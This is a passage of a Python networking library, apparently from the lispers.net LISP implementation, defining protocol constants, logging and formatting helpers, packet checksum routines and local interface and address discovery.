import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
import pprint
lisp_print_rloc_probe_list = False

lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True

lisp_map_notify_queue = {}
lisp_map_servers_list = {}
lisp_ddt_map_requestQ = {}
lisp_db_list = []
lisp_group_mapping_list = {}
lisp_map_resolvers_list = {}
lisp_rtr_list = {}
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}

lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []

lisp_test_mr_timer = None
lisp_rloc_probe_timer = None

lisp_registered_count = 0

lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}

lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
lisp_data_plane_security = False
lisp_search_decap_keys = True

lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False

lisp_crypto_ephem_port = None

lisp_pitr = False

lisp_l2_overlay = False

lisp_rloc_probing = False
lisp_rloc_probe_list = {}

lisp_register_all_rtrs = True

lisp_nonce_echoing = False
lisp_nonce_echo_list = {}

lisp_nat_traversal = False

lisp_program_hardware = False

lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"

lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"

lisp_ipc_lock = None
lisp_default_iid = 0
lisp_default_secondary_iid = 0

lisp_ms_rtr_list = []

lisp_nat_state_info = {}

lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()

lisp_last_icmp_too_big_sent = 0

LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []

lisp_policies = {}

lisp_load_split_pings = False

lisp_eid_hashes = []

lisp_reassembly_queue = {}

lisp_pubsub_cache = {}

lisp_decent_push_configured = False

lisp_decent_modulus = 0
lisp_decent_dns_suffix = None

lisp_ipc_socket = None

lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}

lisp_rtr_nat_trace_cache = {}

lisp_glean_mappings = []

lisp_gleaned_groups = {}

lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
    lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_ICMP)
    lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)

lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9

LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6

lisp_map_reply_action_string = ["no-action", "native-forward",
    "send-map-request", "drop-action", "policy-denied",
    "auth-failure", "send-subscribe"]

LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32

LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16

LISP_MR_TTL = (24 * 60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240

LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = 0.5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1

LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
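# Note (illustrative, added): the LISP_CS_* values below identify crypto
# cipher suites (RFC 8061 style); the matching _G/_P constants are
# Diffie-Hellman generator and prime parameters used during key exchange.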
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
# Append the most recent traceback to ./logs/lisp-traceback.log and also
# echo it to stdout.
def lisp_record_traceback(*args):
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    fd = open("./logs/lisp-traceback.log", "a")
    fd.write("---------- Exception occurred: {} ----------\n".format(ts))
    try:
        traceback.print_last(file=fd)
    except:
        fd.write("traceback.print_last(file=fd) failed")
    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")
    fd.close()
    return

# Install the traceback recorder as the uncaught-exception hook.
def lisp_set_exception():
    sys.excepthook = lisp_record_traceback
    return
def lisp_is_raspbian():
    if (distro.linux_distribution()[0] != "debian"): return (False)
    return (platform.machine() in ["armv6l", "armv7l"])

def lisp_is_ubuntu():
    return (distro.linux_distribution()[0] == "Ubuntu")

def lisp_is_fedora():
    return (distro.linux_distribution()[0] == "fedora")

def lisp_is_centos():
    return (distro.linux_distribution()[0] == "centos")

def lisp_is_debian():
    return (distro.linux_distribution()[0] == "debian")

def lisp_is_debian_kali():
    return (distro.linux_distribution()[0] == "Kali")

def lisp_is_macos():
    return (platform.uname()[0] == "Darwin")

def lisp_is_alpine():
    return (os.path.exists("/etc/alpine-release"))
def lisp_is_x86():
    machine = platform.machine()
    return (machine in ("x86", "i686", "x86_64"))

def lisp_is_linux():
    return (platform.uname()[0] == "Linux")

def lisp_is_python2():
    version = sys.version.split()[0]
    return (version[0:3] == "2.7")

def lisp_is_python3():
    version = sys.version.split()[0]
    return (version[0:2] == "3.")
def lisp_on_aws():
    bios_vendor = getoutput("sudo dmidecode -s bios-vendor")
    if (bios_vendor.find("command not found") != -1 and lisp_on_docker()):
        title = bold("AWS check", False)
        lprint("{} - dmidecode not installed in docker container".format(title))
    return (bios_vendor.lower().find("amazon") != -1)

def lisp_on_gcp():
    bios_version = getoutput("sudo dmidecode -s bios-version")
    return (bios_version.lower().find("google") != -1)

def lisp_on_docker():
    return (os.path.exists("/.dockerenv"))
# Reopen stdout on the per-process logfile if an external rotation removed
# the current one.
def lisp_process_logfile():
    logfile = "./logs/lisp-{}.log".format(lisp_log_id)
    if (os.path.exists(logfile)): return

    sys.stdout.close()
    sys.stdout = open(logfile, "a")

    lisp_print_banner(bold("logfile rotation", False))
    return
def lisp_i_am(name):
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname

    lisp_log_id = name
    if (name == "itr"): lisp_i_am_itr = True
    if (name == "etr"): lisp_i_am_etr = True
    if (name == "rtr"): lisp_i_am_rtr = True
    if (name == "mr"): lisp_i_am_mr = True
    if (name == "ms"): lisp_i_am_ms = True
    if (name == "ddt"): lisp_i_am_ddt = True
    if (name == "core"): lisp_i_am_core = True

    # Cache the hostname with the domain-name part stripped.
    lisp_hostname = socket.gethostname()
    index = lisp_hostname.find(".")
    if (index != -1): lisp_hostname = lisp_hostname[0:index]
    return
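# Usage sketch (illustrative, added): each lispers.net component calls
# lisp_i_am("itr"), lisp_i_am("ms"), etc. once at startup so the role flags
# and log id are set before any packets are processed.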
def lprint(*args):
    force_it = ("force" in args)
    if (lisp_debug_logging == False and force_it == False): return

    lisp_process_logfile()
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]
    print("{}: {}:".format(ts, lisp_log_id), end=" ")

    for arg in args:
        if (arg == "force"): continue
        print(arg, end=" ")
    print()

    try: sys.stdout.flush()
    except: pass
    return

# Log even when debug logging is disabled.
def fprint(*args):
    fargs = args + ("force", )
    lprint(*fargs)
    return

# Data-plane logging, gated separately from control-plane debug logging.
def dprint(*args):
    if (lisp_data_plane_logging): lprint(*args)
    return

# Print a class instance and its attribute dictionary.
def cprint(instance):
    print("{}:".format(instance))
    pprint.pprint(instance.__dict__)

def debug(*args):
    lisp_process_logfile()

    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]

    print(red(">>>", False), end=" ")
    print("{}:".format(ts), end=" ")
    for arg in args: print(arg, end=" ")
    print(red("<<<\n", False))
    try: sys.stdout.flush()
    except: pass
    return
def lisp_print_caller():
    fprint(traceback.print_last())

def lisp_print_banner(string):
    global lisp_version, lisp_hostname

    if (lisp_version == ""):
        lisp_version = getoutput("cat lisp-version.txt")
    hostname = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
        datetime.datetime.now(), lisp_version, hostname))
    return
def green(string, html):
    if (html): return ('<font color="green"><b>{}</b></font>'.format(string))
    return (bold("\033[92m" + string + "\033[0m", html))

def green_last_sec(string):
    return (green(string, True))

def green_last_min(string):
    return ('<font color="#58D68D"><b>{}</b></font>'.format(string))

def red(string, html):
    if (html): return ('<font color="red"><b>{}</b></font>'.format(string))
    return (bold("\033[91m" + string + "\033[0m", html))

def blue(string, html):
    if (html): return ('<font color="blue"><b>{}</b></font>'.format(string))
    return (bold("\033[94m" + string + "\033[0m", html))

def bold(string, html):
    if (html): return ("<b>{}</b>".format(string))
    return ("\033[1m" + string + "\033[0m")
def convert_font(string):
    fonts = [["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold]]
    end_marker = "[0m"

    # Find the first ANSI marker present in the string.
    for font in fonts:
        marker = font[0]
        font_func = font[1]
        marker_len = len(marker)
        index = string.find(marker)
        if (index != -1): break

    # Replace each marker..."[0m" span with the HTML-producing font call.
    while (index != -1):
        end_index = string[index::].find(end_marker)
        text = string[index + marker_len:index + end_index]
        string = string[:index] + font_func(text, True) + string[index + end_index + marker_len::]
        index = string.find(marker)

    # Recurse when a nested bold marker still needs converting.
    if (string.find("[1m") != -1): string = convert_font(string)
    return (string)
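# Note (illustrative, added): convert_font() rewrites the ANSI escape
# markers embedded by red()/green()/blue()/bold() into HTML tags, so log
# text built for a terminal can also be rendered on a web page.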
def lisp_space(num):
    output = ""
    for i in range(num): output += " "
    return (output)

def lisp_button(string, url):
    button = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'

    if (url == None):
        html = button + string + "</button>"
    else:
        anchor = '<a href="{}">'.format(url)
        pad = lisp_space(2)
        html = pad + anchor + button + string + "</button></a>" + pad

    return (html)
def lisp_print_cour(string):
    output = '<font face="Courier New">{}</font>'.format(string)
    return(output)
def lisp_print_sans(string):
    output = '<font face="Sans-Serif">{}</font>'.format(string)
    return(output)
def lisp_span(string, hover_string):
    output = '<span title="{}">{}</span>'.format(hover_string, string)
    return(output)
def lisp_eid_help_hover(output):
    eid_help = '''Unicast EID format:
  For longest match lookups:
    <address> or [<iid>]<address>
  For exact match lookups:
    <prefix> or [<iid>]<prefix>
Multicast EID format:
  For longest match lookups:
    <address>-><group> or
    [<iid>]<address>->[<iid>]<group>'''

    hover = lisp_span(output, eid_help)
    return(hover)
def lisp_geo_help_hover(output):
    geo_help = '''EID format:
  <address> or [<iid>]<address>
  '<name>' or [<iid>]'<name>'
Geo-Point format:
  d-m-s-<N|S>-d-m-s-<W|E> or
  [<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
  d-m-s-<N|S>-d-m-s-<W|E>/<km> or
  [<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''

    hover = lisp_span(output, geo_help)
    return(hover)
def space(num):
    #
    # HTML non-breaking spaces, same behavior as lisp_space().
    #
    output = ""
    for i in range(num): output += "&#160;"
    return(output)
def lisp_get_ephemeral_port():
    return(random.randrange(32768, 65535))
def lisp_get_data_nonce():
    #
    # The LISP data-header nonce is 24 bits.
    #
    return(random.randint(0, 0xffffff))
def lisp_get_control_nonce():
    #
    # Control-message nonces are 64 bits.
    #
    return(random.randint(0, (2**64) - 1))
def lisp_hex_string(integer_value):
    #
    # Strip the "0x" prefix, and the trailing "L" that Python 2 puts
    # on long integers.
    #
    value = hex(integer_value)[2::]
    if (value[-1] == "L"): value = value[0:-1]
    return(value)
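#
# Example (editor's illustration): lisp_hex_string(255) returns "ff".
# The "L" strip matters on Python 2, where hex(2**64) returns
# "0x10000000000000000L".
#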
def lisp_get_timestamp():
    return(time.time())
def lisp_set_timestamp(seconds):
    return(time.time() + seconds)
def lisp_print_elapsed(ts):
    if (ts == 0 or ts == None): return("never")
    elapsed = time.time() - ts
    elapsed = round(elapsed, 0)
    return(str(datetime.timedelta(seconds=elapsed)))
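#
# Example (editor's illustration): for a timestamp taken 90 seconds ago
# this returns "0:01:30", the str() form of datetime.timedelta(seconds=90).
#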
def lisp_print_future(ts):
    if (ts == 0): return("never")
    future = ts - time.time()
    if (future < 0): return("expired")
    future = round(future, 0)
    return(str(datetime.timedelta(seconds=future)))
def lisp_print_eid_tuple(eid, group):
    eid_str = eid.print_prefix()
    if (group.is_null()): return(eid_str)

    group_str = group.print_prefix()
    iid = group.instance_id

    #
    # Print the (*, G) form when there is no source EID.
    #
    if (eid.is_null() or eid.is_exact_match(group)):
        index = group_str.find("]") + 1
        return("[{}](*, {})".format(iid, group_str[index::]))

    #
    # Otherwise print the full (S, G) form.
    #
    sg_str = eid.print_sg(group)
    return(sg_str)
def lisp_convert_6to4(addr_str):
    #
    # Strip the "::ffff:" prefix from an IPv4-mapped IPv6 address,
    # e.g. "::ffff:10.0.0.1" becomes "10.0.0.1".
    #
    if (addr_str.find("::ffff:") == -1): return(addr_str)
    addr = addr_str.split(":")
    return(addr[-1])
def lisp_convert_4to6(addr_str):
    #
    # Store an IPv4 address string as an IPv4-mapped IPv6 lisp_address.
    #
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
    addr.store_address(addr_str)
    return(addr)
def lisp_gethostbyname(string):
    ipv4 = string.split(".")
    ipv6 = string.split(":")
    mac = string.split("-")

    #
    # Dotted-quad IPv4 addresses are returned as-is.
    #
    if (len(ipv4) == 4):
        if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
            ipv4[3].isdigit()): return(string)

    #
    # Strings with colons whose first field parses as hex are IPv6
    # addresses, returned as-is.
    #
    if (len(ipv6) > 1):
        try:
            int(ipv6[0], 16)
            return(string)
        except:
            pass

    #
    # Check for a MAC address in xxxx-yyyy-zzzz notation. DNS names can
    # also contain dashes, so fields must parse as hex to qualify.
    #
    if (len(mac) == 3):
        for i in range(3):
            try: int(mac[i], 16)
            except: break

    try:
        addr = socket.gethostbyname(string)
        return(addr)
    except:
        if (lisp_is_alpine() == False): return("")

    #
    # On Alpine Linux gethostbyname() can fail, so retry the lookup
    # with getaddrinfo().
    #
    try:
        addr = socket.getaddrinfo(string, 0)[0]
        if (addr[3] != string): return("")
        addr = addr[4][0]
    except:
        addr = ""
    return(addr)
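#
# Examples (editor's illustration): "10.0.0.1" and "fe80::1" come back
# unchanged; "localhost" goes through the resolver and typically returns
# "127.0.0.1"; an unresolvable name returns "".
#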
def lisp_ip_checksum(data, hdrlen=20):
    if (len(data) < hdrlen):
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return(data)

    hex_data = binascii.hexlify(data)

    #
    # Sum the header as 16-bit words (4 hex digits at a time).
    #
    checksum = 0
    for i in range(0, hdrlen * 2, 4):
        checksum += int(hex_data[i:i+4], 16)

    #
    # Fold the carry bits back in and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Insert the checksum into bytes 10-11 of the header.
    #
    checksum = struct.pack("H", checksum)
    packet = data[0:10] + checksum + data[12::]
    return(packet)
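#
# Worked example (editor's illustration) of the one's-complement sum
# above, on the two 16-bit words 0x4500 and 0x0054:
#   sum      = 0x4500 + 0x0054            = 0x4554
#   fold     = (sum >> 16) + (sum & 0xffff) = 0x4554 (no carry here)
#   checksum = ~0x4554 & 0xffff           = 0xbaab
# A receiver summing all words including the checksum gets 0xffff.
#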
def lisp_icmp_checksum(data):
    if (len(data) < 36):
        lprint("ICMP packet too short, length {}".format(len(data)))
        return(data)

    hex_data = binascii.hexlify(data)

    #
    # Sum 16-bit words (4 hex digits at a time).
    #
    checksum = 0
    for i in range(0, 36, 4):
        checksum += int(hex_data[i:i+4], 16)

    #
    # Fold the carry bits back in and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Insert the checksum into bytes 2-3 of the ICMP header.
    #
    checksum = struct.pack("H", checksum)
    icmp = data[0:2] + checksum + data[4::]
    return(icmp)
def lisp_udp_checksum(source, dest, data):
    #
    # Build an IPv6 pseudo-header: source, dest, UDP length, and
    # next-header (UDP).
    #
    s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
    d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
    udp_length = socket.htonl(len(data))
    next_header = socket.htonl(LISP_UDP_PROTOCOL)
    pheader = s.pack_address()
    pheader += d.pack_address()
    pheader += struct.pack("II", udp_length, next_header)

    #
    # Hexlify and pad to a 16-bit word (4 hex digit) boundary.
    #
    sum_data = binascii.hexlify(pheader + data)
    remainder = len(sum_data) % 4
    for i in range(0, remainder): sum_data += "0"

    #
    # Sum 16-bit words.
    #
    checksum = 0
    for i in range(0, len(sum_data), 4):
        checksum += int(sum_data[i:i+4], 16)

    #
    # Fold the carry bits back in and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Insert the checksum into bytes 6-7 of the UDP header.
    #
    checksum = struct.pack("H", checksum)
    udp = data[0:6] + checksum + data[8::]
    return(udp)
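#
# Note (editor's): this is the pseudo-header checksum of RFC 2460
# section 8.1. Because the sum covers the source and destination
# addresses in addition to the UDP header and payload, corruption of
# the addresses is detected as well.
#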
def lisp_igmp_checksum(igmp):
    hex_data = binascii.hexlify(igmp)

    #
    # Sum the first 12 bytes as 16-bit words (4 hex digits at a time).
    #
    checksum = 0
    for i in range(0, 24, 4):
        checksum += int(hex_data[i:i+4], 16)

    #
    # Fold the carry bits back in and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Insert the checksum into bytes 2-3 of the IGMP header.
    #
    checksum = struct.pack("H", checksum)
    igmp = igmp[0:2] + checksum + igmp[4::]
    return(igmp)
def lisp_get_interface_address(device):
    #
    # Check for an unknown device name.
    #
    if (device not in netifaces.interfaces()): return(None)

    #
    # Check that IPv4 addresses are assigned to the interface.
    #
    addresses = netifaces.ifaddresses(device)
    if (netifaces.AF_INET not in addresses): return(None)

    #
    # Return the first IPv4 address found.
    #
    return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    for addr in addresses[netifaces.AF_INET]:
        addr_str = addr["addr"]
        return_address.store_address(addr_str)
        return(return_address)
    return(None)
def lisp_get_input_interface(packet):
    #
    # The first 12 bytes of the frame are the destination and source
    # MAC addresses (6 bytes each).
    #
    macs = lisp_format_packet(packet[0:12])
    macs = macs.replace(" ", "")
    da = macs[0:12]
    sa = macs[12::]

    try: my_sa = (sa in lisp_mymacs)
    except: my_sa = False

    if (da in lisp_mymacs): return(lisp_mymacs[da], sa, da, my_sa)
    if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
    return(["?"], sa, da, my_sa)
def lisp_get_local_interfaces():
    for device in netifaces.interfaces():
        interface = lisp_interface(device)
        interface.add_interface()
    return
def lisp_get_loopback_address():
    #
    # Return the first loopback peer address that is not 127.0.0.1.
    #
    for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
        if (addr["peer"] == "127.0.0.1"): continue
        return(addr["peer"])
    return(None)
def lisp_is_mac_string(mac_str):
    #
    # A MAC string is "xxxx-yyyy-zzzz", optionally with a "/<len>"
    # suffix: 14 characters with exactly 2 dashes.
    #
    mac = mac_str.split("/")
    if (len(mac) == 2): mac_str = mac[0]
    return(len(mac_str) == 14 and mac_str.count("-") == 2)
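#
# Examples (editor's illustration): "0000-1111-2222" and
# "0000-1111-2222/48" return True; "00:11:22:33:44:55" returns False.
#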
def lisp_get_local_macs():
    for device in netifaces.interfaces():
        #
        # Skip interface names that are not alphanumeric once ":" and
        # "-" are stripped.
        #
        name = device.replace(":", "").replace("-", "")
        if (name.isalnum() == False): continue

        #
        # netifaces.ifaddresses() can raise for some pseudo-interfaces.
        #
        try:
            parms = netifaces.ifaddresses(device)
        except:
            continue

        if (netifaces.AF_LINK not in parms): continue
        mac = parms[netifaces.AF_LINK][0]["addr"]
        mac = mac.replace(":", "")

        #
        # Ignore interfaces with short (non-EUI-48) MAC addresses.
        #
        if (len(mac) < 12): continue

        if (mac not in lisp_mymacs): lisp_mymacs[mac] = []
        lisp_mymacs[mac].append(device)

    lprint("Local MACs are: {}".format(lisp_mymacs))
    return
def lisp_get_local_rloc():
    #
    # Find the interface the default route points at.
    #
    out = getoutput("netstat -rn | egrep 'default|0.0.0.0'")
    if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))

    out = out.split("\n")[0]
    device = out.split()[-1]

    addr = ""
    macos = lisp_is_macos()
    if (macos):
        out = getoutput("ifconfig {} | egrep 'inet '".format(device))
        if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
    else:
        cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
        out = getoutput(cmd)
        if (out == ""):
            cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
            out = getoutput(cmd)

        if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))

    #
    # Return the address from the first matching line.
    #
    addr = ""
    out = out.split("\n")

    for line in out:
        a = line.split()[1]
        if (macos == False): a = a.split("/")[0]
        address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
        return(address)
    return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
def lisp_get_local_addresses():
    global lisp_myrlocs

    #
    # Honor the LISP_ADDR_SELECT environment variable. It can name a
    # device, a 1-based address index, or both as "<device>:<index>".
    #
    device_select = None
    address_select = 1
    select = os.getenv("LISP_ADDR_SELECT")
    if (select != None and select != ""):
        select = select.split(":")
        if (len(select) == 2):
            device_select = select[0]
            address_select = select[1]
        else:
            if (select[0].isdigit()):
                address_select = select[0]
            else:
                device_select = select[0]

        address_select = 1 if (address_select == "") else int(address_select)

    rlocs = [None, None, None]
    rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    iid = None

    for device in netifaces.interfaces():
        if (device_select != None and device_select != device): continue
        addresses = netifaces.ifaddresses(device)
        if (addresses == {}): continue

        #
        # Get the instance-ID configured on the interface.
        #
        iid = lisp_get_interface_instance_id(device, None)

        #
        # Find the selected IPv4 address, skipping loopback, link-local,
        # null, and EID-configured addresses.
        #
        if (netifaces.AF_INET in addresses):
            ipv4 = addresses[netifaces.AF_INET]
            count = 0
            for addr in ipv4:
                rloc4.store_address(addr["addr"])
                if (rloc4.is_ipv4_loopback()): continue
                if (rloc4.is_ipv4_link_local()): continue
                if (rloc4.address == 0): continue
                count += 1
                rloc4.instance_id = iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
                rlocs[0] = rloc4
                if (count == address_select): break

        if (netifaces.AF_INET6 in addresses):
            ipv6 = addresses[netifaces.AF_INET6]
            count = 0
            for addr in ipv6:
                addr_str = addr["addr"]
                rloc6.store_address(addr_str)
                if (rloc6.is_ipv6_string_link_local(addr_str)): continue
                if (rloc6.is_ipv6_loopback()): continue
                count += 1
                rloc6.instance_id = iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
                rlocs[1] = rloc6
                if (count == address_select): break

        #
        # Keep looking if no usable IPv4 address was found on this
        # device.
        #
        if (rlocs[0] == None): continue

        rlocs[2] = device
        break

    v4 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
    v6 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
    device = rlocs[2] if rlocs[2] else "none"

    device_select = " (user selected)" if device_select != None else ""

    v4 = red(v4, False)
    v6 = red(v6, False)
    device = bold(device, False)
    lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}".format(
        v4, v6, device, device_select, iid))

    lisp_myrlocs = rlocs
    return((rlocs[0] != None))
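#
# LISP_ADDR_SELECT examples (derived from the parsing above):
#   LISP_ADDR_SELECT="eth0"    use the first usable address on eth0
#   LISP_ADDR_SELECT="eth0:2"  use the second address on eth0
#   LISP_ADDR_SELECT="2"       use the second address on any device
#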
def lisp_get_all_addresses():
    address_list = []
    for interface in netifaces.interfaces():
        try: entry = netifaces.ifaddresses(interface)
        except: continue

        if (netifaces.AF_INET in entry):
